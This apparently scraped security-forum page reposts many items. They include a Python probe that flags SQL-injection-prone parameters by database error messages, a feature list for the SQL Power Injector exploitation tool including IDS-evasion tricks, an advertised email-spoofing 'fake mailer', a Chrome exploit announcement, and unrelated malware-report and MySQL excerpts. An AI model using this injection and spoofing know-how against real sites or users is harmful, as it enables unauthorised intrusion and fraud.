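        signatures.append((dbms, re.compile(pattern, re.IGNORECASE)))
    return signatures

def trigger_urls(url, trigger="'"):
    """One probe URL per query parameter, with the trigger appended to that parameter
    only (sqid's default trigger is the single quote); the rest of the URL is unchanged."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, value) in enumerate(params):
        probed = params[:i] + [(name, value + trigger)] + params[i + 1:]
        probes.append(urlunsplit(parts._replace(query=urlencode(probed))))
    return probes

def find_db_errors(body, signatures):
    """Return (dbms, matched text) for every signature that appears in a response body."""
    hits = []
    for dbms, regex in signatures:
        match = regex.search(body)
        if match:
            hits.append((dbms, match.group(0)))
    return hits

if __name__ == "__main__":
    sigs = load_signatures(SIGNATURE_DB)
    for probe in trigger_urls("http://example.test/item.php?id=5&sort=name"):
        print("probe:", probe)
    # Constructed response bodies standing in for what the probes would fetch.
    for body in ("ORA-01756: quoted string not properly terminated",
                 "Warning: mysql_fetch_array() expects parameter 1 to be resource",
                 "<html><body>Item 5</body></html>"):
        print(find_db_errors(body, sigs))
```

A signature hit tells you the page echoes database errors to the client; it does not by itself prove an injectable query, which is also the limit of the tool's own output.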
-
SQL Power injector Introduction SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page. For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server. If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only there is a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability is more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance). The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application. The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standards SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible. 
Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies). I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, You will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection. Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time. Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible of any misuses or damage caused by this application. What It's Not This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found. 
Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique. Moreover, I didn't intent to make it to be a database pumping application. There are plenty good applications for that purpose. In any cases many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want. Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why that you won't be able to use it as a conventional browser even though it has the same look and feel. Features Supported on Windows, Unix and Linux operating systems SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant SSL support Load automatically the parameters from a form or a IFrame on a web page (GET or POST) Detect and browse the framesets Option that auto detects the language of the web site Detect and add cookies used during the Load Page process (Set-Cookie detection) Find automatically the submit page(s) with its method (GET or POST) displayed in a different color Can create/modify/delete loaded string and cookies parameters directly in the Datagrids Single SQL injection Blind SQL injection Comparison of true and false response of the page or results in the cookie Time delay Response of the SQL injection in a customized browser Can view the HTML code source of the returned page in HTML contextual colors and search in it Fine tuning parameters and cookies injection Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection 
Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed Multithreading (configurable up to 50) Option to replace space by empty comments /**/ against IDS or filter detection Automatically encode special characters before sending them Automatically detect predefined SQL errors in the response page Automatically detect a predefined word or sentence in the response page Real time result Save and load sessions in a XML file Feature that automatically finds the differences between the response page of a positive answer with a negative one Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you Automatic replaying a variable range with a predefined list from a text file Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies) Two integrated tools: Hex and Char encoder and MS SQL @options interpreter Can edit the Referer Can choose a User-Agent (or even create one in the User-Agent XML file) Can configure the application with the settings window Support configurable proxies Differences with Other Tools To be honest, I didn't study all the other tools features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection. Some application will find the SQL injection for you that sometimes will result in false positive. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user. But none of them have the ability to specifically choose what you want as far as I know. 
That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required. Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually. I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures) I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section. Summary of the differences: Web page string and cookie parameters auto detection Fine tuning parameters SQL injection Time delay feature Multithread feature Response results in a customized browser Automated positive and negative condition discovery Blind SQL injection characters preset optimizer Screenshots You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind. Screen 1: SQL Power injector with Normal technique Screen 2: SQL Power injector with Blind technique Some Statistic Figures I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. 
Another thing: I didn't make enough tests (10 times for each thread count) to have a real statistical sample, since the goal of these numbers is to show approximately what you can expect. Moreover, it will also depend on the size of the data sought. Sometimes a lower number of threads will be more effective than a higher one. In fact, the time taken will be optimal if the length of the value is divisible by the number of threads. So let's say we have a 24 character length: 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the biggest gap in time between any two thread counts is from 1 to 2. As you can see, higher is not always better. You will see some examples in the following statistics. Even though you can go up to 50 threads, I have discovered that around 10 threads it starts to have errors and gets slower and slower. So again, a bigger number of threads is not necessarily better. I must warn as well that the higher the number of threads is, the higher the chances are of crashing the web application (web server or database).

I must thank Nathaniel Felsen for having allowed me to test on one of his web servers and my wife Elizabeth for having done all the tedious tests for me in her free time.

Here are the characteristics of the computer used to make the tests:
AMD Athlon™ 64 X2 Dual Core Processor 4200+ GHz
2 GB of RAM
Windows XP SP 2
ADSL 1 MB/s
Ping round trip average time of 173 ms

Download: http://www.sqlpowerinjector.com/download.htm
-
Skype in negotiations for a partnership with Microsoft?
Nytro replied to Nytro's topic in Stiri securitate
No, Google had pretty much started monopolizing; Microsoft has fallen somewhat behind... -
Who cares where they got the idea from; our problem is to find ways to make lots of money out of this, easily and of course legally.
-
SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering
Nytro posted a topic in Programe hacking
SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering

The SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers that have a SWF file that crashes Flash Player and now want to get rid of all parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable.

Download: https://github.com/sporst/SWFREtools/downloads

Source: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News -
Online Fake Mailer

As IT managed services are now focusing on clouds, so is information security. Spam mails are the biggest threat to every individual and it is not going to end any sooner. But nowadays spam filters do their job quite efficiently, making spammers' lives a bit worried. So here is an online, we mean a "cloud service", which can test both spammers' and spam filters' skills.

Small list of features:
Email doesn't go in spam folder
Instant delivery of emails
With Attachment Support
With HTML Editor
And Many Other Features

http://emkei.cz/
-
Google Chrome Pwned by VUPEN aka Sandbox/ASLR/DEP Bypass

Hi everyone, We are (un)happy to announce that we have officially Pwned Google Chrome and its sandbox. The exploit shown in this video is one of the most sophisticated codes we have seen and created so far as it bypasses all security features including ASLR/DEP/Sandbox, it is silent (no crash after executing the payload), it relies on undisclosed (0day) vulnerabilities discovered by VUPEN and it works on all Windows systems (32-bit and x64). The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level. Note: The Calculator is used here as an example, it can be replaced by any other payload. While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP. This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services.

Source and demo video: http://www.vupen.com/demos/
-
Skype in negotiations for a partnership with Microsoft?
09 May 2011 | 11:29 Aurelian Mihai

Skype, the renowned provider of internet telephony services, has become the subject of gossip following information that surfaced last week announcing intense negotiations between the company's officials and representatives of Facebook and Google, apparently to establish a partnership or even to acquire the company. More recently, even Microsoft appears to be entering the negotiations, and there are plenty of motivations for a possible partnership or the acquisition of Skype's portfolio:

Acquiring or partnering with Skype could put the company in a favorable position on the enterprise communications market, where Skype already has a solid presence in voice, video and sharing services.
By acquiring Skype, Microsoft would gain the right to integrate the company's services into future versions of the Windows Mobile platform, thus boosting its adoption by a wider audience.
Together with Skype, Microsoft would have the opportunity to collaborate with the major mobile network operators, many of whom are already interested in a partnership with Skype.

Information from sources close to Skype promises an official announcement during this week. While a full acquisition is unlikely, we may witness the creation of a partnership between Microsoft and Skype, similar to the one already established with Nokia, from which both companies would benefit.

Source: Skype in negotiations for a partnership with Microsoft?
-
Facebook pays you to watch ads!
09 May 2011 | 10:21 Aurelian Mihai

Facebook has introduced a new promotion program through which users are financially motivated to watch certain ads. Watching ads distributed through the Facebook network is rewarded using the credits system, each ad being rewarded with 1 credit, or the equivalent of 10 cents. Even though this cannot be called a substantial reward, the promise of a gain could be enough for those users who spend a lot of time connected to Facebook anyway and want to somehow make that time pay. Paid advertising messages will appear mainly in games, such as Crowd Star, Digital Chocolate and Zynga. Facebook is collaborating with Sharethrough, SocialVibe, Epic Media and SupersonicAds to supply ads within the program, as well as TrialPay, a survey system whose participants are financially rewarded. Dan Greenberg, CEO of Sharethrough, stated that Facebook's initiative represents a departure from the traditional system of interruptive ads, offering advertising messages with an entertainment character, which users will want to watch and pass on to their friends. Although the earnings cannot be transferred to a credit card, the Facebook credits system gives us the possibility to spend this money on various goods promoted in the ads we watch, or on other virtual goods available within the network.

Source: Facebook te pl
-
Securing The Kernel via Static Binary Rewriting and Program Shepherding Piotr Bania [: www.piotrbania.com :] 2011 Abstract Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise. To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt. Our solution is especially directed towards preventing remote kernel exploitation attempts. Additionally, many of the local privilege escalation attacks are also blocked (also due to additional mitigation techniques we have implemented). Our tool was tested with Microsoft Windows XP, Windows Vista and Windows 7 (under both virtual and physical machines) on IA-32 compatible processors. Our apparatus is also completely standalone and does not require any third party software. Download: http://www.piotrbania.com/all/articles/pbania-securing-the-kernel2011.pdf
-
Poisoned Google image searches becoming a problem Posted on 06 May 2011. If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble when it comes to cleaning up its image search results. ISC's Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple. For one, they attack and compromise a great variety of legitimate websites - usually those which use Wordpress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it. Then, they introduce PHP scripts in the sites' source code. "These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content," he explains. They also harvest other sites for images, and embed them into the site. When the scripts detect Google's crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database. "The exploit happens when a user clicks on the thumbnail," says Zdrnja. "Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background." Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. 
The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script - this time it's a JavaScript one - that redirects the browser to another compromised site that serves malware. Users should be careful on what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results.

More on Google image poisoning: http://isc.sans.edu/diary/More+on+Google+image+poisoning/10822

Source: Poisoned Google image searches becoming a problem
-
Windows Phone 7 Development for Absolute Beginners
64 Parts

This video series will help aspiring Windows Phone 7 developers get started. We'll start off with the basics and work our way up so in a few hours, you will know enough to build simple WP7 applications, such as a GPS aware note taking application. We'll walk you through getting the tools, knowing what an if statement is, to using the GPS built into the phone and much more! Our friend, Bob Tabor from .NET Tutorial Videos from Beginner to Expert | LearnVisualStudio.NET, will be your guide through this series.

Download the entire series Source Code in C#
Download the entire series Source Code in VB.Net

Series Introduction - Day 1 - Part 1 (5 minutes, 34 seconds)
Installing Visual Studio 2010 Express for Windows Phone - Day 1 - Part 2 (3 minutes, 3 seconds)
Writing your First Windows Phone 7 Application - Day 1 - Part 3 (12 minutes, 34 seconds)
Overview of the Windows Phone 7 Emulator - Day 1 - Part 4 (9 minutes, 4 seconds)
Dissecting the First Application you Wrote - Day 1 - Part 5 (22 minutes, 1 second)
Managing Project Files and Understanding Compilation and Deployment - Day 1 - Part 6 (8 minutes, 17 seconds)
Overview of Visual Studio 2010 Express for Windows Phone IDE - Day 1 - Part 7 (21 minutes, 17 seconds)
Working with Projects - Day 1 - Part 8 (12 minutes, 58 seconds)
Declaring Variables and Assigning Values - Day 1 - Part 9 (17 minutes, 56 seconds)
Accepting Input and Assigning Values from a TextBox - Day 1 - Part 10 (12 minutes, 50 seconds)

Tutorial list: http://channel9.msdn.com/Series/Windows-Phone-7-Development-for-Absolute-Beginners
-
A Collection of Examples of 64-bit Errors in Real Programs
September 25, 2010 4:01 AM PDT

Abstract

This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++; however, it will be useful for other programmers as well.

Introduction

Our company OOO "Program Verification Systems" develops a special static analyzer, Viva64, that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code, since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources:
Lessons on development of 64-bit C/C++ applications [1];
About size_t and ptrdiff_t [2];
20 issues of porting C++ code on the 64-bit platform [3];
PVS-Studio Tutorial [4];
A 64-bit horse that can count [5].
You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here: Download PVS-Studio.

Example 1. Buffer overflow

struct STRUCT_1 { int *a; };
struct STRUCT_2 { int x; };
...
STRUCT_1 Abcd;
STRUCT_2 Qwer;
memset(&Abcd, 0, sizeof(Abcd));
memset(&Qwer, 0, sizeof(Abcd));

In this program, two objects of the STRUCT_1 and STRUCT_2 types are defined which must be zeroed (all the fields must be initialized with nulls) before being used. While implementing the initialization, the programmer decided to copy a similar line and replaced "&Abcd" with "&Qwer" in it. But he forgot to replace "sizeof(Abcd)" with "sizeof(Qwer)". Due to mere luck, the sizes of the STRUCT_1 and STRUCT_2 structures coincided on a 32-bit system and the code has been working correctly for a long time. When porting the code to the 64-bit system, the size of the Abcd structure increased and it resulted in a buffer overflow error (see Figure 1).

Figure 1 - Schematic explanation of the buffer overflow example

Such an error is difficult to detect if the data which should be used much later get spoiled.

Article: http://software.intel.com/en-us/articles/collection-of-examples-of-64-bit-errors-in-real-programs/
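The sizeof mismatch from Example 1 above, made observable: this is an added C example, not code from the article or from the PVS-Studio authors. It keeps the two structures from the article, but places the STRUCT_2 storage in a constructed byte buffer followed by a canary region (the buffer, the canary pattern 0xAA and the ZERO_OBJECT macro are my own additions), so that the number of bytes written past Qwer can be counted instead of silently corrupting whatever happens to follow it. On a 32-bit build both structures are 4 bytes and nothing is clobbered; on a 64-bit build the pointer member makes STRUCT_1 8 bytes and the buggy memset overruns by 4.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The two structures from the article. On ILP32 both are 4 bytes;
 * on LP64/LLP64 the pointer member grows STRUCT_1 to 8 bytes. */
struct STRUCT_1 { int *a; };
struct STRUCT_2 { int x; };

/* Zeroing macro that derives the size from the object being zeroed, so the
 * address and the size can never refer to different objects (assumed fix). */
#define ZERO_OBJECT(obj) memset(&(obj), 0, sizeof(obj))

#define CANARY_BYTES 16
#define CANARY_FILL  0xAA

/* Constructed probe: a byte buffer laid out as [ STRUCT_2 storage ][ canary ].
 * memset(buf, 0, n) is applied and the number of canary bytes that changed is
 * returned. Writing through the enclosing buffer keeps the experiment inside
 * one object, so the overrun is measurable without undefined behaviour. */
static size_t count_clobbered(size_t n) {
    unsigned char buf[sizeof(struct STRUCT_2) + CANARY_BYTES];
    const unsigned char *canary = buf + sizeof(struct STRUCT_2);
    size_t clobbered = 0;

    memset(buf, CANARY_FILL, sizeof buf);   /* known pattern everywhere */
    if (n > sizeof buf) n = sizeof buf;     /* never leave the probe buffer */
    memset(buf, 0, n);                      /* the zeroing under test */

    for (size_t i = 0; i < CANARY_BYTES; i++)
        if (canary[i] != CANARY_FILL) clobbered++;
    return clobbered;
}

/* The article's bug: Qwer's storage is zeroed using sizeof(Abcd). */
size_t buggy_overrun_bytes(void) {
    struct STRUCT_1 Abcd;
    memset(&Abcd, 0, sizeof(Abcd));          /* this line is correct */
    return count_clobbered(sizeof(Abcd));    /* wrong size applied to Qwer */
}

/* Fixed version: the size comes from the object actually being zeroed. */
size_t fixed_overrun_bytes(void) {
    struct STRUCT_2 Qwer;
    ZERO_OBJECT(Qwer);
    return count_clobbered(sizeof(Qwer));
}

/* How many bytes STRUCT_1 outgrows STRUCT_2 on this target: 0 on ILP32, 4 on 64-bit. */
size_t size_gap(void) {
    return sizeof(struct STRUCT_1) - sizeof(struct STRUCT_2);
}

int main(void) {
    printf("sizeof(STRUCT_1)=%zu sizeof(STRUCT_2)=%zu\n",
           sizeof(struct STRUCT_1), sizeof(struct STRUCT_2));
    printf("buggy memset clobbers %zu byte(s) past Qwer; fixed clobbers %zu\n",
           buggy_overrun_bytes(), fixed_overrun_bytes());
    return 0;
}
```

The ZERO_OBJECT macro is the cheap structural defence: once address and size are taken from the same expression, copy-paste cannot desynchronise them, which is exactly the class of mistake a static analyzer such as the one the article describes is built to catch.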
-
TDL3: The Rootkit of All Evil?
Account of an Investigation into a Cybercrime Group
Aleksandr Matrosov, senior virus researcher
Eugene Rodionov, rootkit analyst

Contents
DOGMA MILLIONS CYBERCRIME GROUP
DOGMA MILLIONS
THE DROPPER
DETECTING VIRTUAL MACHINE ENVIRONMENT
CHECKING LOCALES
INSTALLING KERNEL MODE DRIVER
Using AddPrintProcessor and AddPrintProvidor API
Using known dlls
THE ROOTKIT
INFECTION
READING AND WRITING DATA FROM/TO HARD DISK
HOW TO SURVIVE AFTER REBOOT
INJECTING MODULES INTO PROCESSES
ENCRYPTED FILE SYSTEM
INJECTOR
COMMUNICATION PROTOCOL
TASKS
APPENDIX A
APPENDIX B
APPENDIX C
APPENDIX D

Download: http://www.eset.com/us/resources/white-papers/TDL3-Analysis.pdf
-
Stuxnet Under the Microscope
A detailed analysis from ESET.
Aleksandr Matrosov, Senior Virus Researcher
Eugene Rodionov, Rootkit Analyst
David Harley, Senior Research Fellow
Juraj Malcho, Head of Virus Laboratory

Contents
1 INTRODUCTION
1.1 TARGETED ATTACKS
1.2 STUXNET VERSUS AURORA
1.3 STUXNET REVEALED
1.4 STATISTICS ON THE SPREAD OF THE STUXNET WORM
2 MICROSOFT, MALWARE AND THE MEDIA
2.1 SCADA, SIEMENS AND STUXNET
2.2 STUXNET TIMELINE
3 DISTRIBUTION
3.1 THE LNK EXPLOIT
3.1.1 Propagation via External Storage Devices
3.1.2 Metasploit and WebDAV Exploit
3.1.3 What Do DLL Hijacking Flaws and the LNK Exploit have in Common?
3.2 LNK VULNERABILITY IN STUXNET
3.3 THE MS10-061 ATTACK VECTOR
3.4 NETWORK SHARED FOLDERS AND RPC VULNERABILITY (MS08-067)
3.5 0-DAY IN WIN32K.SYS (MS10-073)
3.6 MS10-092: EXPLOITING A 0-DAY IN TASK SCHEDULER
4 STUXNET IMPLEMENTATION
4.1 USER-MODE FUNCTIONALITY
4.1.1 Overview of the main module
4.1.2 Injecting code
4.1.3 Injecting into a current process
4.1.4 Injecting into a new process
4.1.5 Installation
4.1.6 Exported functions
4.1.7 RPC Server
4.1.8 Resources
4.2 KERNEL-MODE FUNCTIONALITY
4.2.1 MRXCLS.sys
4.2.2 MRXNET.sys
4.3 STUXNET BOT CONFIGURATION DATA
4.4 REMOTE COMMUNICATION PROTOCOL
CONCLUSION
APPENDIX A
APPENDIX B
APPENDIX C
APPENDIX D
APPENDIX E

Download: http://www.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf
-
Writing MySQL Programs Using C
Author: Paul DuBois

Many web developers view development of C programs as a bit of a black art. Development of programs in a compiled language such as C is vastly different from the development of applications in a scripting language. To familiarize more developers with the MySQL C API, we present a three-part series of articles tailored to developers looking to get into C program development with MySQL. This first article is the full chapter from Paul DuBois' industry-standard work, MySQL, Fourth Edition, from Addison-Wesley. The second article, from Mark Schoonover, to be published next week, will cover development with the C API using the Eclipse CDT to write a sample program. The third article, also from Mark Schoonover, will go into more depth and expand the example program using more advanced features of the API.

The chapter covers a lot of ground, including the following topics:
Starting development with the C API for MySQL
How to write client programs that communicate with the server over secure connections using the Secure Sockets Layer (SSL) protocol.
How to write applications that use libmysqld, the embedded server library.
How to send multiple statements to the server at once and then process the result sets that come back.
How to use server-side prepared statements.

And, without further ado, please download Chapter 7 of MySQL, Fourth Edition, by Paul DuBois (ISBN 0-672-32938-7). Used by permission. Copyright © 2009 Pearson Education, Inc. All rights reserved.

Download: http://www.kitebird.com/mysql-book/ch07-4ed.pdf
-
Developing Database Applications Using MySQL Connector/C++

This tutorial will show you the essential steps to build and install the MySQL Connector/C++ driver, with simple examples to connect, insert, and retrieve data from a MySQL database. Because the focus is on database connectivity from a C++ application, this document assumes that some kind of MySQL database is already up and accessible from the client machine. Application developers who are new to MySQL Connector/C++ but not to C++ programming and MySQL database, are the target audience of this tutorial.

Listed below are the tools and technologies used to compile, build and run the examples in this tutorial.
Database: MySQL Server 5.1.24-rc
C++ Driver: MySQL Connector/C++ 1.0.5
MySQL Client Library: MySQL Connector/C 6.0
Compiler: Sun Studio 12 C++ compiler
Make: CMake 2.6.3
Operating System: OpenSolaris 2008.11 32-bit
CPU / ISA: Intel Centrino / x86
Hardware: Toshiba Tecra M2 Laptop

CONTENTS
MySQL C++ Driver Based on JDBC 4.0 Specification
Installing MySQL Connector/C++
Runtime Dependencies
IDE for Developing C++ Applications
Create the City Table in the test Database for Code Examples
Testing the MySQL Database Connectivity With the Connector/C++
Using Prepared Statements
Using Transactions
Accessing Result Set Metadata
Accessing Database Metadata
Accessing Parameter Metadata from a PreparedStatement Object
Catching Exceptions
Debug Tracing with MySQL Connector/C++
For More Information

Tutorial: http://dev.mysql.com/tech-resources/articles/mysql-connector-cpp.html
-
What's New in MySQL 5.6

With MySQL 5.5 generally available and being deployed all over the planet, the architects and strategists can start looking ahead to the exciting new thing with "SQL" in its name: MySQL 5.6. MySQL 5.6 builds on the momentum of 5.5, and Oracle's investment and commitment to MySQL, by delivering better performance and scalability. At this year's MySQL Conference & Expo, you'll hear about:
Optimizer improvements for all-around query performance.
InnoDB improvements for higher transactional throughput.
New NoSQL-style memcached APIs.
Partitioning improvements for querying and managing huge tables.
Replication improvements covering many aspects.
Better performance monitoring by expanding the data available through the PERFORMANCE_SCHEMA.

Here are the features that you will get as a graduated series of MySQL 5.6 development milestone releases. The first such milestone release, MySQL 5.6.2, is available for download right now at MySQL :: MySQL Downloads. Start beta testing the 5.6 release now and give feedback to the MySQL engineering team.

Performance Improvements

Optimizer Improvements

Index Condition Pushdown
Moves more of the processing for WHERE clauses to the storage engine. Instead of fetching entire rows to evaluate against a set of WHERE clauses, ICP sends those clauses to the storage engine, which can prune the result set by examining index tuples. The result is less I/O overhead for the base table, and less internal communication overhead for the server and the storage engine. This feature works with InnoDB, MyISAM, and NDBCLUSTER tables. Read more about index condition pushdown.

Multi-Range Read
Until the day when you have all the SSDs you want, it's faster to read data sequentially from disk than to do random accesses. For secondary indexes, the order of the index entries on disk is different from the order of disk blocks for the full rows. Instead of retrieving the full rows using a sequence of small out-of-order reads, MRR scans one or more index ranges used in a query, sorts the associated disk blocks for the row data, then reads those disk blocks using larger sequential I/O requests. The speedup benefits operations such as range index scans and equi-joins on indexed columns. (Think InnoDB foreign keys.) Works with all storage engines. Read more about multi-range read.

File Sort Optimization
For queries that combine ORDER BY non_indexed_column and a LIMIT x clause, this feature speeds up the sort when the contents of x rows can fit into the sort buffer. Works with all storage engines.

InnoDB Improvements

MySQL 5.6 builds on the platform of InnoDB fully integrated as the default storage engine, which happened way back in MySQL 5.5.

Persistent Optimizer Stats
Provides improved accuracy of InnoDB index statistics, and consistency across MySQL restarts. InnoDB precomputes statistics that help the optimizer decide which indexes to use in a query, by sampling a portion of the index. You can adjust the amount of sampling that InnoDB does for each index. The resulting statistics can now persist across server restarts, rather than being recomputed (and possibly changing) due to restarts and some runtime events. The more accurate statistics can improve query performance, and the persistence aspect can keep query performance stable. This feature is controlled by the configuration options innodb_analyze_is_persistent, innodb_stats_persistent_sample_pages, and innodb_stats_transient_sample_pages. When the persistent stats feature is enabled, the statistics are only recomputed when you explicitly run ANALYZE TABLE for the table. Read more about Persistent Optimizer Stats.

New INFORMATION_SCHEMA Tables
Once InnoDB information was made available for queries through the INFORMATION_SCHEMA in MySQL 5.5, people clamored for more kinds of status and monitoring information. The SQL interface is more standardized and predictable than parsing the text output from SHOW STATUS commands.
Metrics table: Provides a generic and comprehensive resource and performance monitoring framework for InnoDB. The new I_S table is INNODB_METRICS.
System Tables: Makes the InnoDB internal data dictionary available for SQL queries, for convenience of monitoring. The new I_S tables are INNODB_SYS_TABLES, INNODB_SYS_TABLESTATS, INNODB_SYS_INDEXES, INNODB_SYS_COLUMNS, INNODB_SYS_FIELDS, INNODB_SYS_FOREIGN, and INNODB_SYS_FOREIGN_COLS.
Buffer Pool Information table: Displays buffer pool page information for tuning on large-memory or highly loaded systems. (Highly requested by customers and community users.) The new I_S tables are INNODB_BUFFER_PAGE, INNODB_BUFFER_PAGE_LRU, and INNODB_BUFFER_POOL_STATS.

Additional Optimizer Support
InnoDB supports the ICP, MRR, and file sort optimizer features mentioned earlier.

Split Kernel Mutex
The InnoDB team continues to remove bottlenecks for busy systems. Now instead of a single mutex controlling concurrent access to core InnoDB operations, several more fine-grained mutexes and rw-locks reduce contention on a busy system. In particular, the subsystems for transaction control, MVCC views, and locking now all have separate mutexes or rw-locks. Read more about the kernel mutex split.

Multi-Threaded Purge
InnoDB now has multiple purge threads, making purge operations across multiple tables more efficient. Originally, purge operations were handled by the InnoDB master thread, leading to contention with other InnoDB operations; in MySQL 5.5, purge was moved into a single separate thread, and in MySQL 5.6 you can set innodb_purge_threads to a value greater than 1. Read more about multiple purge threads.

Separate Flush Thread
A separate flush thread (page_cleaner) makes flushing operations more efficient. This operation was formerly controlled by the InnoDB master thread, leading to contention with other InnoDB operations. Read more about the separate flush thread.

Pruning the InnoDB Table Cache
To ease the memory load on systems with huge numbers of tables, InnoDB now frees up the memory associated with an opened table. An LRU algorithm selects tables that have gone the longest without being accessed. To reserve more memory for open tables, increase the value of the --table_definition_cache=# configuration option. Read more about the InnoDB table cache.

NoSQL Interface via memcached
